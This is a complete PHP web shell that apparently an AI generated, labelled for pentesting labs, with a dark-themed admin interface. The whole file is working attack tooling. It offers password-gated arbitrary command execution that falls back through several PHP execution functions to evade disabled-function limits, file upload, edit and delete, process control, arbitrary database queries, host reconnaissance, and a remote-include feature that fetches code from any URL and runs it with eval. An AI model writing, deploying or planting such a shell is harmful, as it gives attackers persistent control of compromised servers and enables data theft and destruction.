<?php
// PHP Web Shell for Pentesting Labs (PortSwigger, HackTheBox)
// Default Password: Azerty123
// Optimized Dark Theme with Bright Red (#FF0000) Accents
// Enhanced UI: Switched to left sidebar navigation for better admin panel feel, based on modern designs (e.g., from Dribbble, Material Design, Bootstrap admin templates)
// Improved responsiveness, hover effects, shadows
// Added: Create new file in upload section
// Author: Generated by Grok for educational purposes only. Use responsibly in controlled environments.

// Security: Simple password protection
$password = 'Azerty123';
session_start();
if (!isset($_SESSION['authenticated'])) {
    if (isset($_POST['password']) && $_POST['password'] === $password) {
        $_SESSION['authenticated'] = true;
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    } else {
        echo '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Login</title><style>body{background:#121212;color:#fff;font-family:"Segoe UI",Arial,sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}form{background:#1e1e1e;padding:20px;border-radius:8px;box-shadow:0 0 10px rgba(0,0,0,0.5);width:90%;max-width:400px;}h2{text-align:center;color:#fff;font-size:20px;}input[type="password"]{width:100%;padding:10px;margin:10px 0;background:#222;color:#fff;border:1px solid #FF0000;border-radius:4px;font-size:14px;}input[type="submit"]{background:#FF0000;color:#fff;border:none;padding:10px;cursor:pointer;width:100%;border-radius:4px;font-size:14px;transition:background 0.2s;}input[type="submit"]:hover{background:#CC0000;}</style></head><body><form method="post"><h2>Web Shell Login</h2><input type="password" name="password" placeholder="Enter Password"><input type="submit" value="Login"></form></body></html>';
        exit;
    }
}

if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit;
}

// Helper function for safe command execution with bypass
function safe_exec($cmd) {
    $output = '';
    $functions = ['shell_exec', 'exec', 'passthru', 'system', 'popen', 'proc_open'];
    foreach ($functions as $func) {
        if (function_exists($func)) {
            switch ($func) {
                case 'shell_exec': $output = @shell_exec($cmd); break;
                case 'exec': @exec($cmd, $output); $output = implode("\n", $output); break;
                case 'passthru': ob_start(); @passthru($cmd); $output = ob_get_clean(); break;
                case 'system': ob_start(); @system($cmd); $output = ob_get_clean(); break;
                case 'popen': $handle = @popen($cmd, 'r'); if ($handle) { while (!feof($handle)) $output .= fread($handle, 4096); pclose($handle); } break;
                case 'proc_open':
                    $descriptors = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
                    $process = @proc_open($cmd, $descriptors, $pipes);
                    if (is_resource($process)) {
                        fclose($pipes[0]);
                        $output = stream_get_contents($pipes[1]);
                        fclose($pipes[1]); fclose($pipes[2]);
                        proc_close($process);
                    }
                    break;
            }
            if (!empty($output)) return $output;
        }
    }
    return 'No execution function available.';
}

// Current directory handling
$dir = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();
if (!is_dir($dir)) $dir = getcwd();
chdir($dir);

// Handle actions
$action = isset($_GET['action']) ? $_GET['action'] : '';
$message = '';

// File Upload
if (isset($_POST['upload']) && isset($_FILES['file'])) {
    $target = rtrim($dir, '/') . '/' . basename($_FILES['file']['name']);
    if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        $message = 'File uploaded.';
    } else {
        $message = 'Upload failed.';
    }
}

// Create New File
if (isset($_POST['create_file']) && isset($_POST['filename']) && isset($_POST['file_content'])) {
    $filename = trim($_POST['filename']);
    if (!empty($filename)) {
        $target = rtrim($dir, '/') . '/' . $filename;
        if (!file_exists($target)) {
            file_put_contents($target, $_POST['file_content']);
            $message = 'File created.';
        } else {
            $message = 'File already exists.';
        }
    } else {
        $message = 'Filename cannot be empty.';
    }
}

// File Download
if ($action === 'download' && isset($_GET['file'])) {
    $file = realpath($dir . '/' . $_GET['file']);
    if (file_exists($file) && strpos($file, realpath($dir)) === 0) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// File Delete
if ($action === 'delete' && isset($_GET['file'])) {
    $file = $dir . '/' . $_GET['file'];
    if (file_exists($file)) {
        is_dir($file) ? rmdir($file) : unlink($file);
        $message = 'Deleted.';
    }
}

// File Edit
$content = '';
if ($action === 'edit' && isset($_GET['file'])) {
    $file = $dir . '/' . $_GET['file'];
    if (isset($_POST['content'])) {
        file_put_contents($file, $_POST['content']);
        $message = 'Saved.';
    }
    if (file_exists($file)) $content = htmlspecialchars(file_get_contents($file));
}

// Console
$cmd_output = '';
if (isset($_POST['cmd'])) {
    $cmd_output = safe_exec($_POST['cmd']);
}

// System Info
$sysinfo = [];
if ($action === 'sysinfo') {
    $sysinfo = [
        'OS' => php_uname(),
        'PHP' => phpversion(),
        'Server' => $_SERVER['SERVER_SOFTWARE'],
        'User' => safe_exec('whoami'),
        'Disk' => round(disk_free_space('/') / (1024**3), 2) . ' GB free / ' . round(disk_total_space('/') / (1024**3), 2) . ' GB total',
        'Uptime' => safe_exec('uptime'),
        'Network' => safe_exec('ifconfig || ip addr'),
        'Disabled Functions' => ini_get('disable_functions') ?: 'None',
        'Safe Mode' => ini_get('safe_mode') ? 'On' : 'Off',
    ];
}

// Processes
$processes = '';
if ($action === 'processes') {
    $processes = safe_exec('ps aux');
    if (isset($_POST['kill']) && isset($_POST['pid'])) {
        safe_exec('kill -9 ' . intval($_POST['pid']));
        $message = 'Killed.';
    }
    if (isset($_POST['execute']) && isset($_POST['new_cmd'])) {
        safe_exec($_POST['new_cmd'] . ' &');
        $message = 'Started.';
    }
}

// Database
$db_output = '';
if ($action === 'db' && isset($_POST['query'])) {
    $host = $_POST['host'] ?? 'localhost';
    $user = $_POST['user'] ?? 'root';
    $pass = $_POST['pass'] ?? '';
    $dbname = $_POST['dbname'] ?? '';
    try {
        $pdo = new PDO("mysql:host=$host;dbname=$dbname", $user, $pass);
        $stmt = $pdo->query($_POST['query']);
        $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
        $db_output = '<pre>' . htmlspecialchars(print_r($results, true)) . '</pre>';
    } catch (Exception $e) {
        $db_output = 'Error: ' . htmlspecialchars($e->getMessage());
    }
}

// Remote Include
if ($action === 'remote_include' && isset($_POST['url'])) {
    $remote_code = @file_get_contents($_POST['url']);
    if ($remote_code) {
        eval($remote_code); // Caution: Lab use only
        $message = 'Executed.';
    } else {
        $message = 'Fetch failed.';
    }
}

// File List
$files = scandir($dir);
$parent = dirname($dir);
usort($files, function($a, $b) use ($dir) {
    return is_dir($dir . '/' . $a) === is_dir($dir . '/' . $b) ? strnatcmp($a, $b) : (is_dir($dir . '/' . $a) ? -1 : 1);
});

// HTML Output with Sidebar Navigation
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PHP Web Shell</title>
    <style>
        * { box-sizing: border-box; }
        body {
            background: #121212;
            color: #ddd;
            font-family: 'Segoe UI', Arial, sans-serif;
            margin: 0;
            padding: 0;
            font-size: 14px;
            line-height: 1.5;
            display: flex;
        }
        .sidebar {
            width: 220px;
            background: #1a1a1a;
            height: 100vh;
            position: fixed;
            overflow-y: auto;
            box-shadow: 2px 0 5px rgba(0,0,0,0.4);
            padding-top: 20px;
        }
        .sidebar ul {
            list-style: none;
            padding: 0;
            margin: 0;
        }
        .sidebar ul li {
            margin: 8px 16px;
        }
        .sidebar ul li a {
            color: #DDDDD0;
            text-decoration: none;
            padding: 10px 16px;
            display: block;
            background: #222222;
            border: 1px solid #333333;
            border-radius: 2px;
            font-size: 14px;
            font-weight: 500;
            transition: all 0.3s ease;
            box-shadow: 0 2px 4px rgba(0,0,0,0.2);
        }
        .sidebar ul li a:hover {
            border: 1px solid #ff0000;
            transform: translateX(5px);
            box-shadow: 0 4px 8px rgba(0,0,0,0.3);
        }
        .main-container {
            margin-left: 220px;
            padding: 20px;
            width: calc(100% - 220px);
        }
        h1, h2 {
            color: #fff;
            font-size: 18px;
            margin: 12px 0;
        }
        .message {
            color: #0f0;
            font-style: italic;
            margin: 8px 0;
            padding: 8px;
            background: #1e1e1e;
            border-radius: 4px;
        }
        form {
            display: flex;
            flex-direction: column;
            gap: 10px;
            margin-bottom: 20px;
        }
        input, textarea, button {
            background: #222;
            color: #ddd;
            border: 1px solid #FF0000;
            padding: 8px;
            border-radius: 4px;
            font-size: 13px;
        }
        button {
            background: #FF0000;
            cursor: pointer;
            transition: background 0.3s ease, transform 0.2s ease;
        }
        button:hover {
            background: #CC0000;
            transform: translateY(-2px);
        }
        textarea {
            min-height: 150px;
            resize: vertical;
        }
        pre {
            background: #1a1a1a;
            padding: 10px;
            border: 1px solid #333;
            overflow: auto;
            font-size: 12px;
            max-height: 400px;
            border-radius: 4px;
        }
        table {
            width: 100%;
            border-collapse: collapse;
            font-size: 13px;
            margin-bottom: 20px;
        }
        th, td {
            border: 1px solid #333;
            padding: 6px 8px;
            text-align: left;
        }
        th {
            background: #222;
            color: #fff;
        }
        td a {
            color: #FF0000;
            text-decoration: none;
            transition: color 0.2s;
        }
        td a:hover {
            color: #CC0000;
        }
        .actions a {
            margin-right: 10px;
        }
        @media (max-width: 768px) {
            body { flex-direction: column; }
            .sidebar { width: 100%; height: auto; position: relative; padding: 10px 0; }
            .sidebar ul { display: flex; flex-wrap: wrap; justify-content: center; gap: 8px; }
            .sidebar ul li { margin: 0; }
            .main-container { margin-left: 0; width: 100%; padding: 15px; }
        }
    </style>
</head>
<body>
    <nav class="sidebar">
        <ul>
            <li><a href="?dir=<?php echo urlencode($dir); ?>">Files</a></li>
            <li><a href="?action=upload&dir=<?php echo urlencode($dir); ?>">Upload</a></li>
            <li><a href="?action=console&dir=<?php echo urlencode($dir); ?>">Console</a></li>
            <li><a href="?action=sysinfo&dir=<?php echo urlencode($dir); ?>">Sys Info</a></li>
            <li><a href="?action=processes&dir=<?php echo urlencode($dir); ?>">Processes</a></li>
            <li><a href="?action=db&dir=<?php echo urlencode($dir); ?>">DB</a></li>
            <li><a href="?action=remote_include&dir=<?php echo urlencode($dir); ?>">Remote</a></li>
            <li><a href="?logout=1">Logout</a></li>
        </ul>
    </nav>
    <div class="main-container">
        <h1>Dir: <?php echo htmlspecialchars($dir); ?></h1>
        <?php if ($message) echo '<p class="message">' . htmlspecialchars($message) . '</p>'; ?>

        <?php if ($action === 'edit' && $content !== ''): ?>
            <h2>Edit: <?php echo htmlspecialchars($_GET['file']); ?></h2>
            <form method="post">
                <textarea name="content"><?php echo $content; ?></textarea>
                <button type="submit">Save</button>
            </form>
        <?php elseif ($action === 'upload'): ?>
            <h2>Upload / Create File</h2>
            <form method="post" enctype="multipart/form-data">
                <h3>Upload File</h3>
                <input type="file" name="file">
                <button type="submit" name="upload">Upload</button>
            </form>
            <form method="post">
                <h3>Create New File</h3>
                <input type="text" name="filename" placeholder="File name">
                <textarea name="file_content" placeholder="File content"></textarea>
                <button type="submit" name="create_file">Create</button>
            </form>
        <?php elseif ($action === 'console'): ?>
            <h2>Console</h2>
            <form method="post" style="display:flex; gap:10px;">
                <input type="text" name="cmd" placeholder="Command" style="flex:1;">
                <button type="submit">Run</button>
            </form>
            <?php if ($cmd_output): ?><pre><?php echo htmlspecialchars($cmd_output); ?></pre><?php endif; ?>
        <?php elseif ($action === 'sysinfo'): ?>
            <h2>System Info</h2>
            <table>
                <?php foreach ($sysinfo as $key => $value): ?>
                    <tr><th><?php echo htmlspecialchars($key); ?></th><td><?php echo htmlspecialchars($value); ?></td></tr>
                <?php endforeach; ?>
            </table>
        <?php elseif ($action === 'processes'): ?>
            <h2>Processes</h2>
            <pre><?php echo htmlspecialchars($processes); ?></pre>
            <form method="post" style="display:flex; gap:10px;">
                <input type="number" name="pid" placeholder="PID">
                <button type="submit" name="kill">Kill</button>
            </form>
            <form method="post" style="display:flex; gap:10px;">
                <input type="text" name="new_cmd" placeholder="New Command">
                <button type="submit" name="execute">Start</button>
            </form>
        <?php elseif ($action === 'db'): ?>
            <h2>Database</h2>
            <form method="post">
                <input type="text" name="host" placeholder="Host" value="localhost">
                <input type="text" name="user" placeholder="User" value="root">
                <input type="password" name="pass" placeholder="Password">
                <input type="text" name="dbname" placeholder="DB Name">
                <textarea name="query" placeholder="SQL Query"></textarea>
                <button type="submit">Query</button>
            </form>
            <?php if ($db_output): echo $db_output; endif; ?>
        <?php elseif ($action === 'remote_include'): ?>
            <h2>Remote Include</h2>
            <form method="post">
                <input type="text" name="url" placeholder="URL">
                <button type="submit">Execute</button>
            </form>
        <?php else: ?>
            <h2>Files</h2>
            <a href="?dir=<?php echo urlencode($parent); ?>" style="display:block; margin-bottom:12px; color:#FF0000;">[..] Parent</a>
            <table>
                <tr><th>Name</th><th>Size</th><th>Actions</th></tr>
                <?php foreach ($files as $file): if ($file === '.' || $file === '..') continue; $full = $dir . '/' . $file; ?>
                    <tr>
                        <td>
                            <?php if (is_dir($full)): ?>
                                <a href="?dir=<?php echo urlencode($full); ?>"><?php echo htmlspecialchars($file); ?>/</a>
                            <?php else: ?>
                                <?php echo htmlspecialchars($file); ?>
                            <?php endif; ?>
                        </td>
                        <td><?php echo is_file($full) ? number_format(filesize($full)) . ' B' : '-'; ?></td>
                        <td class="actions">
                            <?php if (is_file($full)): ?>
                                <a href="?action=download&file=<?php echo urlencode($file); ?>&dir=<?php echo urlencode($dir); ?>">DL</a>
                                <a href="?action=edit&file=<?php echo urlencode($file); ?>&dir=<?php echo urlencode($dir); ?>">Edit</a>
                            <?php endif; ?>
                            <a href="?action=delete&file=<?php echo urlencode($file); ?>&dir=<?php echo urlencode($dir); ?>" onclick="return confirm('Delete?');">Del</a>
                        </td>
                    </tr>
                <?php endforeach; ?>
            </table>
        <?php endif; ?>
    </div>
</body>
</html>